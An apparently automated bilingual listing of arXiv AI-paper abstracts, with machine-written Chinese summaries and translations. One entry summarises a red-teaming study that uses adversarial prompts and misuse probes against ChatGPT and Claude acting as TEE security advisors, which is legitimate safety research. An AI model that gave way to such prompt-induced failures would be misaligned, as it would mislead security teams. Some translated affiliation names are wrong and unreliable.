Ruisi Wang, Zhongang Cai, Fanyi Pu, Junxiang Xu, Wanqi Yin, Maijunxian Wang, Ran Ji, Chenyang Gu, Bo Li, Ziqi Huang, Hokin Deng, Dahua Lin, Ziwei Liu, Lei Yang

发表机构 * SenseTime Research(秒速科技研究院) Nanyang Technological University(南洋理工大学) University of California, Berkeley(加州大学伯克利分校) University of California, San Diego(加州大学圣地亚哥分校) Carnegie Mellon University(卡内基梅隆大学)

AI总结 本文通过实验揭示视频扩散模型中的推理主要发生在去噪步骤中,提出链式步骤(CoS)机制,并发现工作记忆、自我修正和感知先行等涌现行为,最后提出一种无需训练的集成策略来提升推理能力。

Comments Homepage: https://www.wruisi.com/demystifying_video_reasoning

详情
AI中文摘要

近期视频生成的进展揭示了一个意外现象:基于扩散的视频模型展现出非平凡的推理能力。先前的工作将此归因于链式帧(CoF)机制,假设推理在视频帧间顺序展开。在本工作中,我们挑战这一假设,并揭示了一个根本不同的机制。我们表明视频模型中的推理主要沿着扩散去噪步骤涌现。通过定性分析和针对性探测实验,我们发现模型在早期去噪步骤中探索多个候选解,并逐步收敛到最终答案,我们将此过程称为链式步骤(CoS)。除了这一核心机制,我们还识别出对模型性能至关重要的几种涌现推理行为:(1)工作记忆,支持持久参考;(2)自我修正与增强,允许从不正确的中间解中恢复;(3)先感知后行动,早期步骤建立语义基础,后期步骤执行结构化操作。在扩散步骤内部,我们进一步揭示了扩散变换器中的自演化功能特化:早期层编码密集的感知结构,中间层执行推理,后期层巩固潜在表示。受这些见解的启发,我们提出了一种简单的无需训练的策略作为概念验证,展示了如何通过集成来自相同模型不同随机种子的潜在轨迹来改进推理。总体而言,我们的工作系统性地理解了推理如何在视频生成模型中涌现,为未来研究更好地利用视频模型固有的推理动态作为智能的新基础提供了基础。

英文摘要

Recent advances in video generation have revealed an unexpected phenomenon: diffusion-based video models exhibit non-trivial reasoning capabilities. Prior work attributes this to a Chain-of-Frames (CoF) mechanism, where reasoning is assumed to unfold sequentially across video frames. In this work, we challenge this assumption and uncover a fundamentally different mechanism. We show that reasoning in video models instead primarily emerges along the diffusion denoising steps. Through qualitative analysis and targeted probing experiments, we find that models explore multiple candidate solutions in early denoising steps and progressively converge to a final answer, a process we term Chain-of-Steps (CoS). Beyond this core mechanism, we identify several emergent reasoning behaviors critical to model performance: (1) working memory, enabling persistent reference; (2) self-correction and enhancement, allowing recovery from incorrect intermediate solutions; and (3) perception before action, where early steps establish semantic grounding and later steps perform structured manipulation. During a diffusion step, we further uncover self-evolved functional specialization within Diffusion Transformers, where early layers encode dense perceptual structure, middle layers execute reasoning, and later layers consolidate latent representations. Motivated by these insights, we present a simple training-free strategy as a proof-of-concept, demonstrating how reasoning can be improved by ensembling latent trajectories from identical models with different random seeds. Overall, our work provides a systematic understanding of how reasoning emerges in video generation models, offering a foundation to guide future research in better exploiting the inherent reasoning dynamics of video models as a new substrate for intelligence.

2603.16654 2026-05-27 cs.CL cs.AI cs.LG 版本更新

Omanic: Towards Step-wise Evaluation of Multi-hop Reasoning in Large Language Models

Omanic:迈向大语言模型多跳推理的逐步评估

Xiaojie Gu, Sherry T. Tong, Aosong Feng, Sophia Simeng Han, Jinghui Lu, Yingjian Chen, Yusuke Iwasawa, Yutaka Matsuo, Chanjun Park, Rex Ying, Irene Li

发表机构 * The University of Tokyo(东京大学) Yale University(耶鲁大学) Stanford University(斯坦福大学) Xiaomi EV(小米EV) Soongsil University(顺天大学)

AI总结 针对大语言模型在多跳问答中中间步骤推理失败难以诊断的问题,提出Omanic基准,通过分解为单跳子问题并分析步骤级错误,揭示后期跳数瓶颈、事实知识下限和错误传播,微调后提升多个推理基准性能。

详情
AI中文摘要

仅从最终答案评估大语言模型(LLM)的推理能力可能会掩盖中间步骤的失败,尤其是在没有步骤级标注的多跳问答基准中。为解决这一问题,我们引入了Omanic,一个开放域4跳问答基准,它不仅用于衡量最终答案的准确性,还用于诊断推理在何处中断。Omanic包含10,296个机器生成的训练示例(OmanicSynth)和967个经专家审核的人工标注评估示例(OmanicBench),每个评估问题被分解为单跳子问题、中间答案和结构化图拓扑。对专有和开源LLM的实验表明,Omanic具有挑战性,而逐步分析揭示了后期跳数瓶颈、事实知识下限以及沿推理链的错误传播。在OmanicSynth上微调可迁移到六个推理和数学基准,平均提升7.41分,验证了其作为推理能力迁移监督的有效性。我们在https://huggingface.co/datasets/li-lab/Omanic 发布数据,在https://github.com/XiaojieGu/Omanic 发布代码。

英文摘要

Evaluating the reasoning abilities of large language models (LLMs) solely from final answers can obscure failures in intermediate steps, especially in multi-hop QA benchmarks without step-level annotations. To address this gap, we introduce Omanic, an open-domain 4-hop QA benchmark designed not only to measure final-answer accuracy but also to diagnose where reasoning breaks down. Omanic contains 10,296 machine-generated training examples (OmanicSynth) and 967 expert-reviewed human-annotated evaluation examples (OmanicBench), with each evaluation question decomposed into single-hop sub-questions, intermediate answers, and structured graph topologies. Experiments with proprietary and open-source LLMs show that Omanic is challenging, while step-wise analysis reveals a later-hop bottleneck, factual knowledge floor, and error propagation along reasoning chains. Fine-tuning on OmanicSynth transfers to six reasoning and mathematics benchmarks, yielding a 7.41-point average gain and validating its effectiveness as supervision for reasoning-capability transfer. We release the data at https://huggingface.co/datasets/li-lab/Omanic and the code at https://github.com/XiaojieGu/Omanic.

2603.13853 2026-05-27 cs.CL cs.AI 版本更新

APEX-Searcher: Refining Credit Assignment with Subgoaling for Agentic Retrieval-Augmented Generation

APEX-Searcher: 通过子目标细化信用分配以增强智能体检索增强生成

Kun Chen, Qingchao Kong, Zhao Feifei, Wenji Mao

发表机构 * University of Chinese Academy of Sciences(中国科学院大学) MAIS, Institute of Automation, Chinese Academy of Sciences(中国科学院自动化研究所MAIS部) Wenge Technology Co., Ltd(Wenger科技有限公司)

AI总结 针对复杂多跳问答中检索路径模糊和端到端强化学习奖励稀疏的问题,提出APEX-Searcher,通过分离规划与执行的信用分配(规划用RL优化、执行用SFT学习),在多个基准上取得一致提升。

详情
AI中文摘要

检索增强生成(RAG)将大型语言模型(LLMs)与外部知识连接起来,但单轮检索通常不足以应对复杂的多跳问题。为了增强复杂任务的搜索能力,大多数现有工作通过端到端训练将多轮迭代检索与推理过程相结合。虽然这些方法提高了问题解决性能,但它们仍然面临任务推理和模型训练方面的挑战,尤其是模糊的检索执行路径和端到端强化学习(RL)中的稀疏奖励,这可能导致不准确的检索结果和较低的性能。我们将这些失败归因于层次化的信用纠缠:单一的最终奖励同时更新规划和执行,因此模型无法清晰地区分规划错误和检索错误。我们提出APEX-Searcher,它采用了一种细化信用分配的范式:规划通过带有规划级奖励的RL进行优化,而执行则通过SFT学习。大量实验表明,在多跳RAG和任务规划基准上均取得了一致的提升。

英文摘要

Retrieval-augmented generation (RAG) connects large language models (LLMs) to external knowledge, but single-round retrieval is often insufficient for complex multi-hop questions. To enhance search capabilities for complex tasks, most existing works integrate multi-round iterative retrieval with reasoning processes via end-to-end training. While these approaches improve problem-solving performance, they still face challenges in task reasoning and model training, especially ambiguous retrieval execution paths and sparse rewards in end-to-end reinforcement learning (RL), which can lead to inaccurate retrieval results and lower performance. We attribute these failures to hierarchical credit entanglement: a single final reward updates planning and execution together, so the model cannot clearly separate plan errors from retrieval errors. We propose APEX-Searcher, which uses a Refining Credit Assignment paradigm: planning is optimized by RL with a plan-level reward, while execution is learned by SFT. Extensive experiments show consistent gains in both multi-hop RAG and task planning across benchmarks.

2603.15500 2026-05-27 cs.AI cs.LG 版本更新

Understanding Reasoning in LLMs through Strategic Information Allocation under Uncertainty

不确定性下通过策略信息分配理解LLM中的推理

Jeonghye Kim, Xufang Luo, Minbeom Kim, Sangmook Lee, Dongsheng Li, Yuqing Yang

发表机构 * Microsoft Research(微软研究院) KAIST(韩国科学技术院) Seoul National University(首尔国立大学)

AI总结 本文提出一个信息论框架,将推理分解为程序推进和认知外化(不确定性标记级外化),证明零散外化能在无显式错误触发时恢复收敛,并通过实验表明小规模SFT即可调控该能力,从而将推理重新定义为不确定性下的策略信息分配。

详情
AI中文摘要

LLM 经常表现出“啊哈”时刻,例如在“Wait”等标记后进行自我修正,但其潜在机制仍不清楚。标准 LLM 主要通过无声发散崩溃,即轨迹偏离正确答案但仍保持局部连贯,因此没有显式错误触发反应性自我修正。我们引入一个信息论框架,将推理分解为程序推进和认知外化(不确定性的标记级外化),并证明零散外化能在没有显式错误触发的情况下恢复向正确答案的收敛。实验上,一个最小的怀疑线索即可恢复失败的轨迹,小规模 SFT 足以灌输或抑制这种能力,这表明强推理更少依赖于非凡的内在机制,而更多依赖于外化不确定性的语言习惯。我们的框架将推理重新定义为不确定性下的策略信息分配,为理解和推进 LLM 推理提供了新视角。

英文摘要

LLMs often exhibit Aha moments such as self-correction after tokens like "Wait," yet the underlying mechanism remains unclear. Standard LLMs collapse mainly through silent divergence, where trajectories drift from the correct answer yet remain locally coherent, so no explicit error triggers reactive self-correction. We introduce an information-theoretic framework that separates reasoning into procedural advancement and epistemic verbalization, the token-level externalization of uncertainty, and prove that sporadic verbalization restores convergence toward the correct answer even without explicit error triggers. Empirically, a minimal doubt cue recovers failed trajectories, and small-scale SFT suffices to instill or suppress this capability, suggesting that strong reasoning hinges less on an extraordinary inner mechanism than on the linguistic habit of externalizing uncertainty. Our framework recasts reasoning as strategic information allocation under uncertainty, offering a new lens for understanding and advancing LLM reasoning.

2603.13282 2026-05-27 cs.LG cs.AI 版本更新

FedTreeLoRA: Reconciling Statistical and Functional Heterogeneity in Federated LoRA Fine-Tuning

FedTreeLoRA:协调联邦LoRA微调中的统计异质性与功能异质性

Jieming Bian, Lei Wang, Letian Zhang, Jie Xu

发表机构 * University of Florida, Gainesville, FL 32611(佛罗里达大学) Middle Tennessee State University Murfreesboro, TN 37132(中田纳西州立大学)

AI总结 针对联邦LoRA微调中统计异质性与功能异质性正交耦合的问题,提出树结构聚合框架FedTreeLoRA,通过逐层对齐实现泛化与个性化的有效平衡。

Comments Accepted by ICML 2026

详情
AI中文摘要

基于低秩自适应(LoRA)的联邦学习(FL)已成为隐私保护的大语言模型微调的标准方法。然而,现有的个性化方法主要在一种限制性的平面模型假设下运行:它们处理客户端的 extit{统计异质性},但将模型视为一个整体块,忽略了跨LLM层的 extit{功能异质性}。我们认为这两个维度——统计(水平)异质性和功能(垂直)异质性——在来源上是正交的,但在交互中是耦合的,这意味着参数共享的最优深度在功能上依赖于客户端的相似性。为了解决这个问题,我们提出了 extbf{FedTreeLoRA},一个采用树结构聚合进行细粒度逐层对齐的框架。通过动态构建聚合层次结构,FedTreeLoRA允许客户端在浅层“树干”上共享广泛共识,同时在深层“树枝”上逐步特化。在NLU和NLG基准上的实验表明,FedTreeLoRA通过有效协调泛化与个性化,显著优于现有最先进方法。

英文摘要

Federated Learning (FL) with Low-Rank Adaptation (LoRA) has become a standard for privacy-preserving LLM fine-tuning. However, existing personalized methods predominantly operated under a restrictive Flat-Model Assumption: they addressed client-side \textit{statistical heterogeneity} but treated the model as a monolithic block, ignoring the \textit{functional heterogeneity} across LLM layers. We argue that these two statistical (horizontal) and functional (vertical) dimensions, are \textit{orthogonal in source yet coupled in interaction}, implying that the optimal depth of parameter sharing is functionally dependent on client similarity. To address this, we propose \textbf{FedTreeLoRA}, a framework employing tree-structured aggregation for fine-grained, layer-wise alignment. By dynamically constructing an aggregation hierarchy, FedTreeLoRA allows clients to share broad consensus on shallow `trunks' while progressively specializing on deep `branches'. Experiments on NLU and NLG benchmarks demonstrate that FedTreeLoRA significantly outperforms state-of-the-art methods by effectively reconciling generalization and personalization.

2603.08413 2026-05-27 cs.LG cs.AI 版本更新

Geometrically Constrained Outlier Synthesis

几何约束异常合成

Daniil Karzanov, Marcin Detyniecki

发表机构 * AXA AI Research(AXA人工智能研究) EPFL, Lausanne, Switzerland(瑞士洛桑联邦理工学院) Polish Academy of Science, IBS PAN, Warsaw, Poland(波兰科学院,IBS PAN,华沙,波兰)

AI总结 提出几何约束异常合成(GCOS)方法,通过在隐藏特征空间中生成受几何约束的虚拟异常样本,结合对比正则化,提升图像分类模型对分布外样本的鲁棒性。

Comments 19 pages, accepted to ICML 2026

详情
AI中文摘要

用于图像分类的深度神经网络通常对分布外(OOD)样本表现出过度自信。为了解决这个问题,我们引入了几何约束异常合成(GCOS),这是一种训练时正则化框架,旨在提高推理时的OOD鲁棒性。GCOS通过生成隐藏特征空间中尊重分布内(ID)数据学习到的流形结构的虚拟异常,解决了先前合成方法的局限性。合成分两个阶段进行:(i)从训练特征中提取的主方差子空间识别出几何信息引导的离流形方向;(ii)由校准集中非一致性得分的经验分位数定义的一个类共形壳,自适应地控制合成幅度以产生边界样本。该壳确保生成的异常既不是微不足道可检测的,也不是与分布内数据无法区分的,从而促进更平滑地学习鲁棒特征。这与对比正则化目标相结合,在选定的得分空间(如马氏距离或基于能量的)中促进ID和OOD样本的可分离性。实验表明,在近OOD基准测试(定义为异常与分布内数据共享相同语义域的任务)上,使用标准基于能量的推理时,GCOS优于最先进的方法。作为探索性扩展,该框架自然地过渡到共形OOD推理,将不确定性得分转化为统计上有效的p值,并启用具有形式误差保证的阈值,为更可预测和可靠的OOD检测提供了途径。

英文摘要

Deep neural networks for image classification often exhibit overconfidence on out-of-distribution (OOD) samples. To address this, we introduce Geometrically Constrained Outlier Synthesis (GCOS), a training-time regularization framework aimed at improving OOD robustness during inference. GCOS addresses a limitation of prior synthesis methods by generating virtual outliers in the hidden feature space that respect the learned manifold structure of in-distribution (ID) data. The synthesis proceeds in two stages: (i) a dominant-variance subspace extracted from the training features identifies geometrically informed, off-manifold directions; (ii) a conformally-inspired shell, defined by the empirical quantiles of a nonconformity score from a calibration set, adaptively controls the synthesis magnitude to produce boundary samples. The shell ensures that generated outliers are neither trivially detectable nor indistinguishable from in-distribution data, facilitating smoother learning of robust features. This is combined with a contrastive regularization objective that promotes separability of ID and OOD samples in a chosen score space, such as Mahalanobis or energy-based. Experiments demonstrate that GCOS outperforms state-of-the-art methods using standard energy-based inference on near-OOD benchmarks, defined as tasks where outliers share the same semantic domain as in-distribution data. As an exploratory extension, the framework naturally transitions to conformal OOD inference, which translates uncertainty scores into statistically valid p-values and enables thresholds with formal error guarantees, providing a pathway toward more predictable and reliable OOD detection.

2603.03585 2026-05-27 cs.CL cs.AI 版本更新

Belief-Sim: Towards Belief-Driven Simulation of Demographic Misinformation Susceptibility

Belief-Sim:迈向信念驱动的人口统计错误信息易感性模拟

Angana Borah, Zohaib Khan, Rada Mihalcea, Verónica Pérez-Rosas

发表机构 * University of Michigan - Ann Arbor(密歇根大学安娜堡分校) Texas State University(德克萨斯州立大学)

AI总结 提出BeliefSim框架,利用心理学分类和调查先验构建人口信念档案,通过提示条件化和后训练适应,实现基于信念模拟人口统计错误信息易感性,对齐度达92%。

Comments Paper Under Review

详情
AI中文摘要

错误信息是一种日益严重的社会威胁,由于潜在信念的差异,不同人口群体对错误信息的易感性各不相同。随着大型语言模型(LLM)越来越多地被用于模拟人类行为,我们研究它们是否能够模拟人口统计错误信息易感性,将信念视为主要驱动因素。我们引入BeliefSim,一个模拟框架,利用心理学信息错误信息分类法和调查先验构建人口信念档案。我们研究了基于提示的条件化和后训练适应,并使用以下方法进行了多方面的评估:(i)易感性对齐和(ii)反事实人口敏感性。在两个数据集和建模策略中,我们表明信念为模拟错误信息易感性提供了强大的先验,对齐度高达92%。

英文摘要

Misinformation is a growing societal threat, and susceptibility to misinformative claims varies across demographic groups due to differences in underlying beliefs. As Large Language Models (LLMs) are increasingly used to simulate human behaviors, we investigate whether they can simulate demographic misinformation susceptibility, treating beliefs as a primary driving factor. We introduce BeliefSim, a simulation framework that constructs demographic belief profiles using psychology-informed misinformation taxonomies and survey priors. We study prompt-based conditioning and post-training adaptation, and conduct a multi-fold evaluation using: (i) susceptibility alignment and (ii) counterfactual demographic sensitivity. Across both datasets and modeling strategies, we show that beliefs provide a strong prior for simulating misinformation susceptibility, with alignment up to 92%.

2603.01800 2026-05-27 cs.LG cs.AI stat.ML stat.OT 版本更新

Phase-Type Variational Autoencoders for Heavy-Tailed Data

Phase-Type变分自编码器用于重尾数据

Abdelhakim Ziani, András Horváth, Paolo Ballarini

发表机构 * Université Paris Saclay, Lab. MICS, CentraleSupélec, Gif-sur-Yvette, France(巴黎萨克雷大学,MICS实验室,CentraleSupélec,法国吉夫-sur-依夫)

AI总结 提出Phase-Type变分自编码器(PH-VAE),通过将解码器分布建模为潜在条件相位型分布(连续时间马尔可夫链的吸收时间),灵活适应重尾行为,在合成和真实基准上优于高斯、Student-t和极值VAE解码器。

详情
AI中文摘要

重尾分布在现实世界数据中无处不在,其中罕见但极端的事件主导了风险和变异性。然而,标准变分自编码器(VAE)采用简单的解码器分布,如高斯分布,无法捕捉重尾行为,而现有的重尾感知扩展仍然局限于预定义的参数族,其尾部行为是预先固定的。我们提出了Phase-Type变分自编码器(PH-VAE),其解码器分布是一个潜在条件的Phase-Type(PH)分布,定义为连续时间马尔可夫链(CTMC)的吸收时间。这种公式组合了多个指数时间尺度,产生了一个灵活且解析可处理的解码器,它直接从观测数据中调整其有限范围的尾部行为。在合成和真实世界基准上的实验表明,PH-VAE能够准确逼近各种重尾分布,在建模观测到的尾部行为和极端分位数方面显著优于基于高斯、Student-t和极值的VAE解码器。在多变量设置中,PH-VAE通过其共享的潜在表示捕捉了现实中的跨维度尾部依赖性。据我们所知,这是首次将Phase-Type分布整合到深度生成建模中的工作,桥接了应用概率论和表示学习。

英文摘要

Heavy-tailed distributions are ubiquitous in real-world data, where rare but extreme events dominate risk and variability. However, standard Variational Autoencoders (VAEs) employ simple decoder distributions, such as Gaussian distributions, that fail to capture heavy-tailed behavior, while existing heavy-tail-aware extensions remain restricted to predefined parametric families whose tail behavior is fixed a priori. We propose the Phase-Type Variational Autoencoder (PH-VAE), whose decoder distribution is a latent-conditioned Phase-Type (PH) distribution, defined as the absorption time of a continuous-time Markov chain (CTMC). This formulation composes multiple exponential time scales, yielding a flexible and analytically tractable decoder that adapts its finite-range tail behavior directly from the observed data. Experiments on synthetic and real-world benchmarks demonstrate that PH-VAE accurately approximates diverse heavy-tailed distributions, significantly outperforming Gaussian, Student-t, and extreme-value-based VAE decoders in modeling observed tail behavior and extreme quantiles. In multivariate settings, PH-VAE captures realistic cross-dimensional tail dependence through its shared latent representation. To our knowledge, this is the first work to integrate Phase-Type distributions into deep generative modeling, bridging applied probability and representation learning.

2602.22190 2026-05-27 cs.LG cs.AI cs.CL 版本更新

GUI-Libra: Training Native GUI Agents to Reason and Act with Action-aware Supervision and Partially Verifiable RL

GUI-Libra:训练原生GUI代理进行推理与行动——基于动作感知监督和部分可验证强化学习

Rui Yang, Qianhui Wu, Zhaoyang Wang, Hanyang Chen, Ke Yang, Hao Cheng, Huaxiu Yao, Baolin Peng, Huan Zhang, Jianfeng Gao, Tong Zhang

发表机构 * UIUC(伊利诺伊大学香槟分校) Microsoft(微软) UNC-Chapel Hill(北卡罗来纳大学教堂山分校)

AI总结 提出GUI-Libra训练方案,通过动作感知SFT和部分可验证RL中的KL正则化,解决GUI代理在长程导航任务中推理与定位冲突及部分可验证性问题,显著提升步骤准确率和任务完成率。

Comments 57 pages, 17 figures

详情
AI中文摘要

开源原生GUI代理在长程导航任务上仍落后于闭源系统。这一差距源于两个限制:缺乏高质量、动作对齐的推理数据,以及直接采用忽视GUI代理独特挑战的通用后训练流程。我们识别出这些流程中的两个基本问题:(i) 带有CoT推理的标准SFT常损害定位能力,(ii) 逐步RLVR式训练面临部分可验证性,即多个动作可能正确但仅有一个示范动作用于验证。这使得离线逐步指标成为在线任务成功的弱预测器。在本工作中,我们提出GUI-Libra,一种定制化训练方案以应对这些挑战。首先,为缓解动作对齐推理数据的稀缺性,我们引入数据构建和过滤流程,并发布精心整理的81K GUI推理数据集。其次,为调和推理与定位,我们提出动作感知SFT,混合推理后动作和直接动作数据,并重新加权token以强调动作和定位。第三,为在部分可验证性下稳定RL,我们识别出RLVR中KL正则化被忽视的重要性,并证明KL信任域对改善离线到在线可预测性至关重要;我们进一步引入成功自适应缩放以降低不可靠负梯度的权重。在多种Web和移动基准测试中,GUI-Libra一致地提升了步骤准确率和端到端任务完成率。我们的结果表明,精心设计的后训练和数据整理可以在无需昂贵在线数据收集的情况下,释放显著更强的任务解决能力。我们发布数据集、代码和模型,以促进对具备推理能力的GUI代理的数据高效后训练的进一步研究。

英文摘要

Open-source native GUI agents still lag behind closed-source systems on long-horizon navigation tasks. This gap stems from two limitations: a shortage of high-quality, action-aligned reasoning data, and the direct adoption of generic post-training pipelines that overlook the unique challenges of GUI agents. We identify two fundamental issues in these pipelines: (i) standard SFT with CoT reasoning often hurts grounding, and (ii) step-wise RLVR-tyle training faces partial verifiability, where multiple actions can be correct but only a single demonstrated action is used for verification. This makes offline step-wise metrics weak predictors of online task success. In this work, we present GUI-Libra, a tailored training recipe that addresses these challenges. First, to mitigate the scarcity of action-aligned reasoning data, we introduce a data construction and filtering pipeline and release a curated 81K GUI reasoning dataset. Second, to reconcile reasoning with grounding, we propose action-aware SFT that mixes reasoning-then-action and direct-action data and reweights tokens to emphasize action and grounding. Third, to stabilize RL under partial verifiability, we identify the overlooked importance of KL regularization in RLVR and show that a KL trust region is critical for improving offline-to-online predictability; we further introduce success-adaptive scaling to downweight unreliable negative gradients. Across diverse web and mobile benchmarks, GUI-Libra consistently improves both step-wise accuracy and end-to-end task completion. Our results suggest that carefully designed post-training and data curation can unlock significantly stronger task-solving capabilities without costly online data collection. We release our dataset, code, and models to facilitate further research on data-efficient post-training for reasoning-capable GUI agents.

2602.19450 2026-05-27 cs.CR cs.AI 版本更新

Red-Teaming Claude Opus and ChatGPT-based Security Advisors for Trusted Execution Environments

对基于Claude Opus和ChatGPT的TEE安全顾问进行红队测试

Kunal Mukherjee, Spandan Mukherjee

发表机构 * Virginia Tech(弗吉尼亚理工大学) The University of Texas at Dallas(德克萨斯大学达拉斯分校)

AI总结 针对TEE安全顾问角色下的LLM助手(ChatGPT-5.2和Claude Opus-4.6),提出TEE-RedBench评估方法,发现提示诱导的失败可跨模型迁移(最高12.02%),并通过LLM-in-the-loop流水线减少80.62%的失败。

Comments Accepted for publication in ACM CAIS '26 Workshop on AI Discovery in the Wild (AID-Wild)

详情
AI中文摘要

可信执行环境(TEE)(例如Intel SGX和Arm TrustZone)旨在保护敏感计算免受受损操作系统的攻击,但实际部署仍然容易受到微架构泄漏、侧信道攻击和故障注入的影响。与此同时,安全团队越来越依赖大型语言模型(LLM)助手作为TEE架构审查、缓解规划和漏洞分类的安全顾问。这创建了一个社会技术风险面:助手可能产生TEE机制的幻觉、过度声称保证(例如,证明能做什么和不能做什么),或在对抗性提示下表现不安全。 我们针对两个广泛部署的LLM助手(ChatGPT-5.2和Claude Opus-4.6)在TEE安全顾问角色中进行了红队研究,重点关注提示诱导失败的固有局限性以及跨LLM的可转移性。我们引入了TEE-RedBench,一种基于TEE的评估方法,包括:(i) 针对LLM中介安全工作的TEE特定威胁模型,(ii) 结构化的提示套件,涵盖SGX和TrustZone架构、证明和密钥管理、威胁建模以及非操作性缓解指导,以及策略边界滥用探测,(iii) 注释标准,联合衡量技术正确性、基础性、不确定性校准、拒绝质量和安全有用性。我们发现一些失败并非纯粹的特异性,可跨LLM助手转移高达12.02%,我们通过概述“LLM-in-the-loop”评估流水线将这些结果与安全架构联系起来:策略门控、检索基础、结构化模板和轻量级验证检查,这些组合可将失败减少80.62%。

英文摘要

Trusted Execution Environments (TEEs) (e.g., Intel SGX and ArmTrustZone) aim to protect sensitive computation from a compromised operating system, yet real deployments remain vulnerable to microarchitectural leakage, side-channel attacks, and fault injection. In parallel, security teams increasingly rely on Large Language Model (LLM) assistants as security advisors for TEE architecture review, mitigation planning, and vulnerability triage. This creates a socio-technical risk surface: assistants may hallucinate TEE mechanisms, overclaim guarantees (e.g., what attestation does and does not establish), or behave unsafely under adversarial prompting. We present a red-teaming study of two prevalently deployed LLM assistants in the role of TEE security advisors: ChatGPT-5.2 and Claude Opus-4.6, focusing on the inherent limitations and transferability of prompt-induced failures across LLMs. We introduce TEE-RedBench, a TEE-grounded evaluation methodology comprising (i) a TEE-specific threat model for LLM-mediated security work, (ii) a structured prompt suite spanning SGX and TrustZone architecture, attestation and key management, threat modeling, and non-operational mitigation guidance, along with policy-bound misuse probes, and (iii) an annotation rubric that jointly measures technical correctness, groundedness, uncertainty calibration, refusal quality, and safe helpfulness. We find that some failures are not purely idiosyncratic, transferring up to 12.02% across LLM assistants, and we connect these outcomes to secure architecture by outlining an "LLM-in-the-loop" evaluation pipeline: policy gating, retrieval grounding, structured templates, and lightweight verification checks that, when combined, reduce failures by 80.62%.

2511.02780 2026-05-27 cs.CR cs.AI cs.SE 版本更新

PoCo: Agentic Proof-of-Concept Exploit Generation for Smart Contracts

PoCo:智能合约的代理式概念验证漏洞利用生成

Vivi Andersson, Sofia Bobadilla, Harald Hobbelhagen, Martin Monperrus

发表机构 * KTH Royal Institute of Technology(皇家理工学院)

AI总结 提出PoCo框架,通过代理式Reason-Act-Observe循环自动从自然语言漏洞描述生成可执行的PoC漏洞利用,在23个真实报告上优于基线方法。

Comments Under review

详情
AI中文摘要

智能合约在高度对抗的环境中运行,漏洞可能导致重大财务损失。因此,智能合约需进行安全审计。在审计中,概念验证(PoC)漏洞利用通过向利益相关者证明报告的漏洞是真实、可重现且可操作的,发挥着关键作用。然而,手动创建PoC耗时、易出错,且常受限于紧张的审计时间表。我们提出PoCo,一个代理式框架,可从审计人员编写的自然语言漏洞描述中自动生成可执行的PoC漏洞利用。PoCo通过在与一组代码执行工具交互的Reason-Act-Observe循环中以代理方式自主生成PoC漏洞利用。它生成与Foundry测试框架兼容的完全可执行漏洞利用,可直接集成到审计报告和其他安全工具中。我们在23个真实漏洞报告的数据集上评估PoCo。PoCo始终优于零样本和工作流基线,生成格式良好且逻辑正确的PoC。我们的结果表明,代理式框架可以显著减少智能合约审计中高质量PoC所需的工作量。我们的贡献为智能合约安全社区提供了可操作的知识。

英文摘要

Smart contracts operate in a highly adversarial environment, where vulnerabilities can lead to substantial financial losses. Thus, smart contracts are subject to security audits. In auditing, proof-of-concept (PoC) exploits play a critical role by demonstrating to the stakeholders that the reported vulnerabilities are genuine, reproducible, and actionable. However, manually creating PoCs is time-consuming, error-prone, and often constrained by tight audit schedules. We introduce PoCo, an agentic framework that automatically generates executable PoC exploits from natural-language vulnerability descriptions written by auditors. PoCo autonomously generates PoC exploits in an agentic manner by interacting with a set of codeexecution tools in a Reason-Act-Observe loop. It produces fully executable exploits compatible with the Foundry testing framework, ready for integration into audit reports and other security tools. We evaluate PoCo on a dataset of 23 real-world vulnerability reports. PoCo consistently outperforms the Zero-shot and Workflow baselines, generating well-formed and logically correct PoCs. Our results demonstrate that agentic frameworks can significantly reduce the effort required for high-quality PoCs in smart contract audits. Our contribution provides actionable knowledge for the smart contract security community.

2510.07231 2026-05-27 cs.CL cs.AI 版本更新

EconCausal: A Context-Aware Economic Reasoning Benchmark for Large Language Models

EconCausal: 面向大语言模型的上下文感知经济推理基准

Donggyu Lee, Hyeok Yun, Meeyoung Cha, Sungwon Park, Sangyoon Park, Jihee Kim

发表机构 * Graduate School of Data Science, KAIST(韩国科学技术院数据科学研究生院) College of Business, KAIST(韩国科学技术院商学院) Data Science for Humanity Group, MPI-SP(马克斯·普朗克所际数据科学为人类集团) School of Computing, KAIST(韩国科学技术院计算学院) Division of Social Science, HKUST(香港科技大学社会科学系)

AI总结 提出EconCausal基准,包含从顶级经济金融期刊提取的10,490个上下文标注因果三元组,评估大语言模型在指定上下文中推断因果方向及随上下文变化调整判断的能力。

详情
AI中文摘要

社会经济因果效应高度依赖于制度和环境背景。相同的干预措施在不同监管制度、市场条件、时间段或人群中可能产生不同甚至相反的效果。这对大语言模型(LLM)在决策支持角色中提出了挑战:它们能否在指定上下文中推断因果效应的方向,并在上下文变化时修正该判断?为此,我们引入了EconCausal,这是一个大规模基准,包含从顶级经济和金融期刊的2,595项高质量实证研究中提取的10,490个上下文标注因果三元组,通过严格的四阶段流程构建,包括多轮共识、上下文细化和多批评者过滤。跨模型实验表明,LLM往往无法根据上下文调整其预测。虽然顶级模型在固定、显式上下文中达到88%的准确率,但在需要跨上下文修正符号的情况下,准确率下降32.6个百分点(从73.9%降至41.3%),一旦引入误导性的符号证据,准确率降至50%以下。模型还过度承诺于方向性(+/-)符号,仅在13.8%的情况下识别出零效应,且在这些类别上校准不良。数据集和基准公开于 https://anonymous.4open.science/r/econcausal-benchmark-6F12。

英文摘要

Socio-economic causal effects depend heavily on their institutional and environmental contexts. The same intervention can produce different, even opposite, effects across regulatory regimes, market conditions, time periods, or populations. This poses a challenge for large language models (LLMs) in decision-support roles: can they infer the direction of a causal effect under a specified context, and revise that judgment when the context changes? To address this, we introduce EconCausal, a large-scale benchmark of 10,490 context-annotated causal triplets extracted from 2,595 high-quality empirical studies in top-tier economics and finance journals, constructed through a rigorous four-stage pipeline with multi-run consensus, context refinement, and multi-critic filtering. Across models, LLMs often fail to condition their predictions on context. While top models reach 88% accuracy in fixed, explicit contexts, accuracy falls by 32.6~pp on cases that require revising the sign across contexts (73.9% to 41.3%), and drops below 50% once misleading signed evidence is introduced. Models also over-commit to directional (+/-) signs, recognizing null effects only 13.8% of the time while remaining poorly calibrated on these categories. The dataset and benchmark are publicly available at https://anonymous.4open.science/r/econcausal-benchmark-6F12.

2602.17605 2026-05-27 cs.CV cs.AI cs.CY cs.LG 版本更新

Adapting Actively on the Fly: Relevance-Guided Online Meta-Learning with Latent Concepts for Geospatial Discovery

在飞行中主动适应:基于相关性的在线元学习与潜在概念用于地理空间发现

Jowaria Khan, Anindya Sarkar, Yevgeniy Vorobeychik, Elizabeth Bondi-Kelly

